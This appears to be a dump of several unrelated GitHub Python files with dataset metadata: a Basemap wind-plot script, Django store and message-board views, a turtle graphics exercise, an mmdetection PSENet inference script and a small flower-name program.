# m.drawcoastlines(color='black',linewidth=0.5)
# m.drawlsmask(land_color='grey',ocean_color='w')
# x,y = m(lons,lats)
# cs2 = m.contourf(x,y,speeds12,range(25,56,1))
# cs1 = m.contour(x,y,hgtss12,20,colors='r',linewidth=1,linestyles='dashed')
# cs = m.quiver(x[::2,::2],y[::2,::2],us12[::2,::2],vs12[::2,::2],scale=450)
# cbar = m.colorbar(cs2,location='bottom',pad='5%',ticks=(xrange(25,61,5)))
# cbar.set_label('Knots')
# plt.title('March %s, 2012, 200 mb Daily Mean Winds and Heights' % time[i],fontsize=16)
# plt.savefig('/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/2012winds.%d.png' % i,dpi=300)
### Panels for March 2012
fig=plt.figure()
fig.suptitle('200mb Zonal Mean Wind and Geopotential Height',fontsize=16)
ax1 = fig.add_subplot(211)
m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
urcrnrlat=61,resolution='l')
m.drawstates()
m.drawcountries()
m.drawmapboundary(fill_color = 'white')
m.drawcoastlines(color='black',linewidth=0.5)
m.drawlsmask(land_color='grey',ocean_color='w')
x,y = m(lons,lats)
cs2 = m.contourf(x,y,speed12,range(25,61,1))
cs2.set_cmap('jet')
cs = m.quiver(x[::2,::2],y[::2,::2],aveu12[::2,::2],avev12[::2,::2],scale=450,color='darkred')
cbar = m.colorbar(cs2,location='right',pad='5%',ticks=list(xrange(25,61,5)))
cbar.set_label('Knots')
plt.title('March 23-26, 2012')
ax1 = fig.add_subplot(212)
m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
urcrnrlat=61,resolution='l')
m.drawstates()
m.drawcountries()
m.drawmapboundary(fill_color = 'white')
m.drawcoastlines(color='black',linewidth=0.5)
m.drawlsmask(land_color='grey',ocean_color='w')
cs2 = m.contour(x,y,avehgts12,range(11000,12500,100),linestyles='dashed',linewidth=1,colors='k')
cs1 = m.contourf(x,y,avehgts12,range(11000,12500,50))
cs1.set_cmap('jet')
cbar1 = m.colorbar(cs1,location='right',pad='5%',ticks=range(11000,12600,200))
cbar1.set_label('Meters')
cbar.set_label('Knots')
plt.subplots_adjust(wspace=0.1)
plt.savefig('/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/march2012_1910_ncep.eps',dpi=400,format='eps') | zmlabe/EarlySpringOnset | Scripts/best_NCEPreanalysis_March2012_plots.py | best_NCEPreanalysis_March2012_plots.py | py | 7,812 | python | en | code | 3 | github-code | 90 |
1893396678 | from django.contrib.auth import get_user_model
from apps.order.models import Order,OrderItem
from apps.cart.cart import Cart
from .models import Product,WishList
User=get_user_model()
def checkout(request,username,email,address):
cart=Cart(request)
order=Order.objects.create(user=User.objects.filter(email=email)[0],email=email,address=address)
order.save()
for item in cart:
OrderItem.objects.create(order=order,product=Product.objects.get(id=item["product_id"]),quantity=item["quantity"],price=item["price"])
return order.id
def wishlist(product_id,quantity,user):
try:
WishList.objects.update_or_create(user=user,product=Product.objects.get(id=product_id),quantity=quantity)
return True
except Exception as e:
return e
| lawrenceuchenye/ecommerce | apps/store/utils.py | utils.py | py | 753 | python | en | code | 0 | github-code | 90 |
29402993641 | import turtle
import math
t = turtle.Turtle()
t.pencolor('red')
#Khai báo các hàm
def chuyen_do_C(do_f):
return (do_f - 32) / 1.8
def hinh_vuong(a):
for i in range(4):
t.fd(a)
t.rt(90)
def da_giac_deu(n, width):
angle = (n-2) * 180 / n
for i in range(n):
t.fd(width)
t.rt(180 - angle)
def dien_tich():
'Hàm tính diện tích hình tròn'
return math.pi * r * r
def hinh_tron(r):
t.hideturtle()
t.pencolor('green')
t.circle(r)
r = float(input('Nhập vào bán kính: '))
a = dien_tich()
print(f'Diện tích của hình tròn có bán kính = {r} là: {a}')
c = chuyen_do_C(100)
print(c)
hinh_vuong(100)
t.penup()
t.goto (200, 200)
t.pendown()
da_giac_deu(6, 100)
hinh_tron(r)
turtle.done()
| VuLong160396/Day11 | Thuc_hanh_hinh_vuong.py | Thuc_hanh_hinh_vuong.py | py | 764 | python | vi | code | 0 | github-code | 90 |
7817416898 | # coding: utf-8
import warnings
import os
import cv2
import six
from PIL import Image
import matplotlib.pyplot as plt
import mmcv
import numpy as np
import pycocotools.mask as maskUtils
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmdet.core import wrap_fp16_model
from mmdet.core import get_classes
from mmdet.datasets.pipelines import Compose
from mmdet.models import build_detector
import matplotlib.pyplot as plt
def init_detector(config, checkpoint=None, device='cuda:0'):
if isinstance(config, str):
config = mmcv.Config.fromfile(config)
elif not isinstance(config, mmcv.Config):
raise TypeError('config must be a filename or Config object, '
'but got {}'.format(type(config)))
config.model.pretrained = None
model = build_detector(config.model, test_cfg=config.test_cfg)
if checkpoint is not None:
checkpoint = load_checkpoint(model, checkpoint)
if 'CLASSES' in checkpoint['meta']:
model.CLASSES = checkpoint['meta']['CLASSES']
else:
warnings.warn('Class names are not saved in the checkpoint\'s '
'meta data, use COCO classes by default.')
model.CLASSES = get_classes('coco')
model.cfg = config # save the config in the model for convenience
model.to(device)
model.eval()
return model
class LoadImage(object):
def __call__(self, results):
if isinstance(results['img'], str):
results['filename'] = results['img']
else:
results['filename'] = None
img = mmcv.imread(results['img'])
results['img'] = img
results['img_shape'] = img.shape
results['ori_shape'] = img.shape
return results
def inference_detector(model, img):
"""Inference image(s) with the detector.
Args:
model (nn.Module): The loaded detector.
imgs (str/ndarray or list[str/ndarray]): Either image files or loaded
images.
Returns:
If imgs is a str, a generator will be returned, otherwise return the
detection results directly.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# build the data pipeline
test_pipeline = [LoadImage()] + cfg.data.test.pipeline[1:]
test_pipeline = Compose(test_pipeline)
# prepare data
data = dict(img=img)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
return result, data['img_meta'][0][0]['scale_factor']
def predict():
config_file = 'configs/psenet_r50.py'
checkpoint_file = 'work_dirs/psenet_r50/epoch_100.pth'
# 100张自标注测试集
img_folder = '/61_data_lxy/data/price_sheet/table_pse_data/180_table_images'
out_folder = '/61_data_lxy/data/price_sheet/output/mm_pse_output'
model = init_detector(config_file, checkpoint_file)
for i in os.listdir(img_folder):
print(i)
# if i != '991.jpg': continue
img_pth = os.path.join(img_folder, i)
org_img = cv2.imread(img_pth)
if org_img is None: continue
h, w = org_img.shape[:2]
result, scale_factor = inference_detector(model, img_pth)
preds, boxes_list = result
if len(boxes_list):
boxes_list = boxes_list / scale_factor
cv2.drawContours(org_img, boxes_list.astype(int), -1, (0, 255, 0), 2)
cv2.imwrite(os.path.join(out_folder, i), org_img)
if __name__ == '__main__':
predict() | liangxiaoyun/mmdetection-1.1.0-pse-sar | tools/inference.py | inference.py | py | 3,663 | python | en | code | 0 | github-code | 90 |
29415682293 | def create_flowerdict(filename):
flower_dict = {}
with open(filename) as f:
for line in f:
letter = line.split(": ")[0].lower()
flower = line.split(": ")[1].strip()
flower_dict[letter] = flower
return flower_dict
def main():
flower_d = create_flowerdict('flowers.txt')
full_name = input("Enter your First [space] Last name only: ")
first_name = full_name[0].lower()
first_letter = first_name[0]
print("Unique flower name with the first letter: {}".format(flower_d[first_letter]))
main() | lorenzowind/python-programming | Data Structures & Algorithms/Scripting programs/match_flower_name.py | match_flower_name.py | py | 566 | python | en | code | 1 | github-code | 90 |
13360159210 | import json
from django.http import HttpResponse, JsonResponse
from rest_framework.decorators import api_view, renderer_classes
from rest_framework.response import Response
from rest_framework.renderers import TemplateHTMLRenderer
from .models import Question, Answer
from django.shortcuts import render, get_object_or_404,redirect, resolve_url
from django.utils import timezone
from .forms import QuestionForm, AnswerForm
from django.core.paginator import Paginator
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth.decorators import login_required
@api_view(['GET'])
@renderer_classes([TemplateHTMLRenderer])
def board_list(request):
page = request.GET.get('page','1') # 페이지
question_list = Question.objects.order_by('-create_date')
paginator = Paginator(question_list,10) # 페이지당 10개 씩 보여주기
page_obj = paginator.get_page(page)
context = {'question_list':page_obj}
return Response(context, template_name='board/question_list.html')
@api_view(['GET'])
@renderer_classes([TemplateHTMLRenderer])
def board_detail(request,question_id):
try:
question = Question.objects.get(id=question_id)
context={'question':question}
return Response(context,template_name='board/question_detail.html')
except Question.DoesNotExist:
return Response(template_name='404.html')
@api_view(['POST'])
@renderer_classes([TemplateHTMLRenderer])
def answer_create(request,question_id):
question = Question.objects.get(id=question_id)
if request.method =="POST":
form = AnswerForm(request.POST)
if form.is_valid():
answer = form.save(commit=False)
if request.user.is_authenticated:
answer.author = request.user # author속성에 로그인계정 저장
else:
nonregisteruser, create = User.objects.get_or_create(username='비회원')
answer.author=nonregisteruser
answer.create_date=timezone.now()
answer.question = question
answer.save()
return redirect('{}#answer_{}'.format(
resolve_url('board:board_detail', question_id=question.id), answer.id))
else:
return Response(template_name='404.html')
context={'question':question, 'form':form}
return Response(context,template_name='board/question_detail.html')
# try:
# question = Question.objects.get(id=question_id)
# answer = Answer(question=question, content=request.POST.get('content',''), create_date=timezone.now())
# answer.save()
# return redirect('board:board_detail',question_id=question.id)
# except Question.DoesNotExist:
# return Response(template_name='404.html')
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def question_create(request):
    """Show the empty question form (GET) or create a question (POST)."""
    if request.method != "POST":
        # GET: render a fresh, unbound form.
        return Response({'form': QuestionForm()},
                        template_name='board/question_form.html')

    form = QuestionForm(request.POST)
    if not form.is_valid():
        # Re-render with the bound form so validation errors are shown.
        return Response({'form': form}, template_name='board/question_form.html')

    question = form.save(commit=False)
    if request.user.is_authenticated:
        question.author = request.user  # logged-in account becomes the author
    else:
        # Anonymous posts are attributed to a shared guest account.
        noregisteruser, created = User.objects.get_or_create(username='비회원')
        question.author = noregisteruser
    question.create_date = timezone.now()
    question.save()
    return redirect('board:board_list')
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def question_modify(request, question_id):
    """Edit an existing question: GET shows the pre-filled form, POST saves it."""
    question = get_object_or_404(Question, pk=question_id)
    # NOTE(review): the author-only permission check is currently disabled,
    # so any caller can modify any question — confirm this is intentional.
    if request.method != "POST":
        form = QuestionForm(instance=question)
        return render(request, 'board/question_form.html', {'form': form})

    form = QuestionForm(request.POST, instance=question)
    if form.is_valid():
        question = form.save(commit=False)
        question.modify_date = timezone.now()  # record when the edit happened
        question.save()
        return redirect('board:board_detail', question_id=question.id)
    # Invalid submission: re-render with the bound form and its errors.
    return render(request, 'board/question_form.html', {'form': form})
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def question_delete(request, question_id):
    """Delete a question and return to the board list.

    NOTE(review): there is no ownership/permission check here — any
    caller can delete any question; confirm this is intentional.
    """
    get_object_or_404(Question, pk=question_id).delete()
    return redirect('board:board_list')
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def answer_modify(request, answer_id):
    """Edit an existing answer: GET shows the pre-filled form, POST saves it."""
    answer = get_object_or_404(Answer, pk=answer_id)
    # NOTE(review): the author-only permission check is currently disabled,
    # so any caller can modify any answer — confirm this is intentional.
    if request.method != "POST":
        form = AnswerForm(instance=answer)
        return render(request, 'board/answer_form.html',
                      {'answer': answer, 'form': form})

    form = AnswerForm(request.POST, instance=answer)
    if form.is_valid():
        answer = form.save(commit=False)
        answer.modify_date = timezone.now()  # record when the edit happened
        answer.save()
        # Jump straight to the edited answer via its fragment anchor.
        return redirect('{}#answer_{}'.format(
            resolve_url('board:board_detail', question_id=answer.question.id),
            answer.id))
    # Invalid submission: re-render with the bound form and its errors.
    return render(request, 'board/answer_form.html', {'answer': answer, 'form': form})
@api_view(['GET','POST'])
@renderer_classes([TemplateHTMLRenderer])
def answer_delete(request, answer_id):
    """Delete an answer, then return to its question's detail page.

    NOTE(review): there is no ownership/permission check here — any
    caller can delete any answer; confirm this is intentional.
    """
    answer = get_object_or_404(Answer, pk=answer_id)
    parent_question_id = answer.question.id  # capture before the row is gone
    answer.delete()
    return redirect('board:board_detail', question_id=parent_question_id)
@api_view(["GET",'POST'])
@login_required(login_url='common:login')
def question_vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
question.voter.add(request.user)
return redirect('board:board_detail', question_id=question.id)
@login_required(login_url='common:login')
def answer_vote(request, answer_id):
    """Record the logged-in user's recommendation vote on an answer.

    NOTE(review): unlike question_vote, this view is not wrapped in
    @api_view/@renderer_classes — confirm whether that asymmetry is
    intentional.
    """
    answer = get_object_or_404(Answer, pk=answer_id)
    answer.voter.add(request.user)  # M2M add is idempotent per user
    detail_url = resolve_url('board:board_detail', question_id=answer.question.id)
    return redirect('{}#answer_{}'.format(detail_url, answer.id))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.